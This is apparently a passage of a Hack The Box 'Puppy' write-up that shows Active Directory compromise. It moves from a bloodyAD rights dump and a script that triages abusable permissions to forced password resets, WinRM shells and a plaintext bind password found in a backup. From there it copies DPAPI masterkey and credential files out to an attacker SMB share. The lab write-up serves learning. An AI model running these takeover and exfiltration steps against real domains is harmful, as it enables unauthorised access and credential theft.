msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE

msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB


ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD

shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
preferredLanguage: WRITE
thumbnailLogo: WRITE
thumbnailPhoto: WRITE
middleName: WRITE
departmentNumber: WRITE
carLicense: WRITE
jpegPhoto: WRITE
audio: WRITE
pager: WRITE
mobile: WRITE
secretary: WRITE
homePhone: WRITE
manager: WRITE
photo: WRITE
roomNumber: WRITE
mail: WRITE
textEncodedORAddress: WRITE
uid: WRITE
userSMIMECertificate: WRITE
msDS-preferredDataLocation: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-KeyCredentialLink: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-AssignedAuthNPolicy: WRITE
msDS-AssignedAuthNPolicySilo: WRITE
msDS-SyncServerUrl: WRITE
msDS-CloudAnchor: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE

msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msDS-PrimaryComputer: WRITE
msTSSecondaryDesktops: WRITE
msTSPrimaryDesktop: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-NcType: WRITE
msTSLSProperty02: WRITE
msTSLSProperty01: WRITE
msTSManagingLS4: WRITE
msTSLicenseVersion4: WRITE
msTSExpireDate4: WRITE
msTSManagingLS3: WRITE
msTSLicenseVersion3: WRITE
msTSExpireDate3: WRITE
msTSManagingLS2: WRITE
msTSLicenseVersion2: WRITE
msTSExpireDate2: WRITE
msDS-HABSeniorityIndex: WRITE
msTSManagingLS: WRITE
msTSLicenseVersion: WRITE
msTSExpireDate: WRITE
msTSProperty02: WRITE
msTSProperty01: WRITE
msTSInitialProgram: WRITE
msTSWorkDirectory: WRITE
msTSDefaultToMainPrinter: WRITE
msTSConnectPrinterDrives: WRITE
msTSConnectClientDrives: WRITE
msTSBrokenConnectionAction: WRITE
msTSReconnectionAction: WRITE
msTSMaxIdleTime: WRITE
msTSMaxConnectionTime: WRITE
msTSMaxDisconnectionTime: WRITE
msTSRemoteControl: WRITE
msTSAllowLogon: WRITE
msTSHomeDrive: WRITE
msTSHomeDirectory: WRITE
msTSProfilePath: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE

msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msDS-AuthenticatedAtDC: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SecondaryKrbTgtNumber: WRITE
msRADIUS-SavedFramedIpv6Route: WRITE
msRADIUS-FramedIpv6Route: WRITE
msRADIUS-SavedFramedIpv6Prefix: WRITE
msRADIUS-FramedIpv6Prefix: WRITE
msRADIUS-SavedFramedInterfaceId: WRITE
msRADIUS-FramedInterfaceId: WRITE
unixUserPassword: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
msDS-SourceObjectDN: WRITE
msDRM-IdentityCertificate: WRITE
msDS-AllowedToDelegateTo: WRITE
msIIS-FTPDir: WRITE
msIIS-FTPRoot: WRITE
lastLogonTimestamp: WRITE
msDS-Site-Affinity: WRITE
msDS-Cached-Membership-Time-Stamp: WRITE
msDS-Cached-Membership: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-CreatorSID: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
accountNameHistory: WRITE
proxiedObjectName: WRITE
msRASSavedFramedRoute: WRITE
msRASSavedFramedIPAddress: WRITE
msRASSavedCallbackNumber: WRITE
msRADIUSServiceType: WRITE
msRADIUSFramedRoute: WRITE
msRADIUSFramedIPAddress: WRITE
msRADIUSCallbackNumber: WRITE
msNPSavedCallingStationID: WRITE
msNPCallingStationID: WRITE
msNPAllowDialin: WRITE
mSMQSignCertificatesMig: WRITE
mSMQDigestsMig: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
uSNSource: WRITE
terminalServer: WRITE

isCriticalSystemObject: WRITE
altSecurityIdentities: WRITE
lastKnownParent: WRITE
aCSPolicyName: WRITE
servicePrincipalName: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
partialAttributeDeletionList: WRITE
lockoutTime: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
assistant: WRITE
otherMailbox: WRITE
mhsORAddress: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
showInAddressBook: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
sIDHistory: WRITE
dynamicLDAPServer: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
groupPriority: WRITE
groupsToIgnore: WRITE
sAMAccountType: WRITE
wbemPath: WRITE
division: WRITE
defaultClassStore: WRITE
controlAccessRights: WRITE
logonCount: WRITE
groupMembershipSAM: WRITE
lmPwdHistory: WRITE
accountExpires: WRITE
comment: WRITE
rid: WRITE
adminCount: WRITE
revision: WRITE
operatorCount: WRITE
profilePath: WRITE
userParameters: WRITE
supplementalCredentials: WRITE
securityIdentifier: WRITE
primaryGroupID: WRITE
preferredOU: WRITE
pwdLastSet: WRITE
ntPwdHistory: WRITE

otherLoginWorkstations: WRITE
unicodePwd: WRITE
userWorkstations: WRITE
maxStorage: WRITE
logonWorkstation: WRITE
logonHours: WRITE
scriptPath: WRITE
localeID: WRITE
dBCSPwd: WRITE
lastLogon: WRITE
lastLogoff: WRITE
badPasswordTime: WRITE
homeDrive: WRITE
homeDirectory: WRITE
flags: WRITE
employeeID: WRITE
countryCode: WRITE
codePage: WRITE
badPwdCount: WRITE
userAccountControl: WRITE
replUpToDateVector: WRITE
replPropertyMetaData: WRITE
objectGUID: WRITE
name: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
employeeType: WRITE
employeeNumber: WRITE
msExchHouseIdentifier: WRITE
msExchLabeledURI: WRITE
USNIntersite: WRITE
wWWHomePage: WRITE
networkAddress: WRITE
msExchAssistantName: WRITE
displayNamePrintable: WRITE
garbageCollPeriod: WRITE
otherHomePhone: WRITE
uSNDSALastObjRemoved: WRITE
streetAddress: WRITE
extensionName: WRITE
adminDescription: WRITE
proxyAddresses: WRITE
adminDisplayName: WRITE
showInAdvancedViewOnly: WRITE
company: WRITE
department: WRITE
co: WRITE
uSNLastObjRem: WRITE
uSNChanged: WRITE
otherPager: WRITE
repsFrom: WRITE
repsTo: WRITE
info: WRITE
objectVersion: WRITE

dSASignature: WRITE
isDeleted: WRITE
uSNCreated: WRITE
otherTelephone: WRITE
displayName: WRITE
subRefs: WRITE
whenChanged: WRITE
whenCreated: WRITE
attributeCertificateAttribute: WRITE
houseIdentifier: WRITE
dn: WRITE
x500uniqueIdentifier: WRITE
generationQualifier: WRITE
initials: WRITE
givenName: WRITE
userCertificate: WRITE
userPassword: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
serialNumber: WRITE
sn: WRITE
objectCategory: WRITE
sAMAccountName: WRITE
objectSid: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
cn: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE

We narrow the search: show only the object DNs (CN=...,DC=PUPPY,DC=HTB) that carry a WRITE right, instead of the full attribute dump above.

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -A 20 "distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -E "distinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE

It turns out Ant.Edwards has write rights over the Adam D. Silver user object. That is enough to reset the account's password (ForceChangePassword abuse); the other writable DNs (the S-1-5-11 foreign security principal and Ant.Edwards' own object) only expose cosmetic attributes.

https://www.hackingarticles.in/forcechangepassword-active-directory-abuse/
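The raw `get writable --detail` dump is hundreds of lines, most of them address-book, shadow* and msSFU30* attributes that lead nowhere. What matters is which objects expose rights that give a path forward. The script below is an added example, not part of the original writeup: it parses bloodyAD's output text, groups attributes per distinguishedName and reports only the rights on my own HIGH_VALUE list. The sample text is constructed from the shape of the output above, not the full dump.

```python
# Added example (not from the original writeup): triage bloodyAD
# "get writable --detail" output. Attribute names and the WRITE /
# CREATE_CHILD right names are as bloodyAD prints them; the HIGH_VALUE
# map is my own selection of what is worth acting on.
import re
from collections import defaultdict

HIGH_VALUE = {
    "unicodePwd": "reset the password (what setuserinfo / set password do)",
    "userPassword": "reset the password over LDAP",
    "member": "add a principal to the group",
    "servicePrincipalName": "set an SPN, then Kerberoast the account",
    "msDS-KeyCredentialLink": "shadow credentials (PKINIT)",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "resource-based constrained delegation",
    "userAccountControl": "clear pre-auth / flip account flags",
    "scriptPath": "logon script runs as the victim",
    "nTSecurityDescriptor": "rewrite the object's DACL",
    "OWNER": "take ownership of the object",
    "DACL": "WriteDACL: grant yourself any right",
}

# "attributeName: RIGHT" lines; attribute names may contain '-' (ms-net-ieee-...)
ATTR_LINE = re.compile(r"^([\w\-]+):\s*([A-Z_]+)$")


def parse_writable(text: str) -> dict:
    """Map distinguishedName -> {attribute: right} from bloodyAD --detail output."""
    rights = defaultdict(dict)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "--":              # blank line or grep group separator
            continue
        if line.startswith("distinguishedName:"):
            current = line.split(":", 1)[1].strip()
            continue
        m = ATTR_LINE.match(line)
        if m and current is not None:
            rights[current][m.group(1)] = m.group(2)
    return dict(rights)


def full_control(attrs: dict) -> bool:
    """WRITE on OWNER, DACL and the password attribute is what GenericAll looks like here."""
    return all(attrs.get(a) == "WRITE" for a in ("OWNER", "DACL", "unicodePwd"))


def triage(rights: dict) -> list:
    """Return (dn, attribute, reason) for every high-value WRITE, fully controlled objects first."""
    hits = []
    for dn, attrs in rights.items():
        for attr, right in attrs.items():
            if right == "WRITE" and attr in HIGH_VALUE:
                hits.append((dn, attr, HIGH_VALUE[attr]))
    hits.sort(key=lambda h: (not full_control(rights[h[0]]), h[0]))
    return hits


# Constructed sample, shaped like the grep'd output above (not the full dump).
SAMPLE = """\
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
thumbnailPhoto: WRITE
pager: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
unicodePwd: WRITE
userAccountControl: WRITE
scriptPath: WRITE
OWNER: WRITE
DACL: WRITE
"""

if __name__ == "__main__":
    for dn, attr, why in triage(parse_writable(SAMPLE)):
        print(f"{dn}\n    {attr}: WRITE  -> {why}")
```

Feed it the real output with `bloodyAD ... get writable --detail > writable.txt` and `parse_writable(open("writable.txt").read())`; the three DNs collapse to a single line of interest, Adam D. Silver, with the password reset as the obvious next step.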

We reset the password with rpcclient (setuserinfo level 23 sets a new password without knowing the old one):


┌──(kali㉿kali)-[~]
└─$ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' xx.xx.xx.xx

rpcclient $> setuserinfo ADAM.SILVER 23 Password@987

rpcclient $>

┌──(kali㉿kali)-[~]
└─$ nxc smb xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\ADAM.SILVER:Password@987

┌──(kali㉿kali)-[~]
└─$ crackmapexec winrm 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB

HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman


/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\ADAM.SILVER:Password@987 (Pwn3d!)

The same reset with bloodyAD, which gives an explicit confirmation:


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip xx.xx.xx.xx set password adam.silver 'Password@987'
[+] Password changed successfully!

A third option is impacket-changepasswd with -altuser/-reset, i.e. an administrative reset performed as ant.edwards rather than a change that needs the old password:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-changepasswd puppy.htb/adam.silver@xx.xx.xx.xx -newpass 'Password@987' -altuser puppy.htb/ant.edwards -altpass Antman2025! -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Setting the password of puppy.htb\adam.silver as puppy.htb\ant.edwards


[*] Connecting to DCE/RPC as puppy.htb\ant.edwards
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Initial Access


We were able to change the password, and the WinRM check above shows the account can log on remotely, so we connect.


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir

Directory: C:\Users\adam.silver\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/17/2025 9:56 PM 34 user.txt

*Evil-WinRM* PS C:\Users\adam.silver\Desktop> type user.txt


b45203f370ae16d7f2e70540f2023a764
*Evil-WinRM* PS C:\Users\adam.silver\Desktop>

Privilege Escalation


We collect the domain with BloodHound. Note that piping ntpdate into bloodhound-python does nothing useful: ntpdate needs root (hence the "Operation not permitted" line), the clock stays skewed, Kerberos fails with KRB_AP_ERR_SKEW and the collector falls back to NTLM, which still works here. Run `sudo ntpdate -u xx.xx.xx.xx` beforehand if Kerberos authentication is required.

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ ntpdate -u xx.xx.xx.xx | bloodhound-python -dc DC.PUPPY.HTB -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx

CLOCK: step_systime: Operation not permitted


INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts

INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S

Back in the Evil-WinRM session we enumerate the file system and find a backup directory:

*Evil-WinRM* PS C:\Backups> dir

Directory: C:\Backups

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip

*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!


*Evil-WinRM* PS C:\Backups>

C:\Backups contains site-backup-2024-12-30.zip. We download it with Evil-WinRM's built-in download command and unpack it locally to inspect the contents:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ ll
total 20
drwxrwxr-x 6 kali kali 4096 Dec 31 1979 assets
drwxrwxr-x 2 kali kali 4096 Dec 31 1979 images
-rw-rw-r-- 1 kali kali 7258 Dec 31 1979 index.html
-rw-r--r-- 1 kali kali 864 Dec 31 1979 nms-auth-config.xml.bak


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/puppy]
└─$ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>

<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>

nms-auth-config.xml.bak holds an LDAP bind DN and its password in clear text:

user: steph.cooper
password: ChefSteph2025!

We check whether these credentials also allow a WinRM logon:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec winrm xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!' -d PUPPY.HTB
HTTP xx.xx.xx.xx 5985 xx.xx.xx.xx [*] http://xx.xx.xx.xx:5985/wsman
WINRM xx.xx.xx.xx 5985 xx.xx.xx.xx [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)

evil-winrm works, so we connect as steph.cooper and enumerate. The interesting locations are the user's DPAPI directories: AppData\Roaming\Microsoft\Protect\<SID>\ holds the masterkey files and AppData\Roaming\Microsoft\Credentials\ holds the saved credential blobs; both are hidden+system, so use ls -Force.

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ evil-winrm -i xx.xx.xx.xx -u 'steph.cooper' -p 'ChefSteph2025!'

Evil-WinRM shell v3.7


Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect

Mode LastWriteTime Length Name


---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> cd S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> ls -force

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\xx.xx.14.xx\share\masterkey_blob

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107>


*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -Force

Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9

*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" \\xx.xx.14.xx\share\credential_blob

We found the DPAPI masterkey file and copied it to our machine, and we copied the credential blob as well (the file in which the user's saved credentials, passwords or tokens, are stored).

Masterkey: the per-user secret key DPAPI uses to encrypt and decrypt that user's protected data. The masterkey file is itself encrypted with a key derived from the user's password and SID, which is why steph.cooper's password and the SID (the name of the Protect subfolder) are needed to unlock it.

Credential blob: the user's stored credential (password or token) data, encrypted under that masterkey.

With both files we can decrypt the DPAPI-protected credential offline.

To receive the files we run an SMB server locally; it has to be up while the copy commands above execute, and the masterkey and credential blob land in the share directory we created:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ mkdir -p ./share

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed


[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (xx.xx.xx.xx,60046)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:share)
[*] Closing down connection (xx.xx.xx.xx,60046)
[*] Remaining connections []
[*] Incoming connection (xx.xx.xx.xx,60098)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
[*] Closing down connection (xx.xx.xx.xx,60098)
[*] Remaining connections []

We decrypt masterkey_blob with impacket's dpapi.py, supplying steph.cooper's password and SID:

┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/share]
└─$ ll
total 8
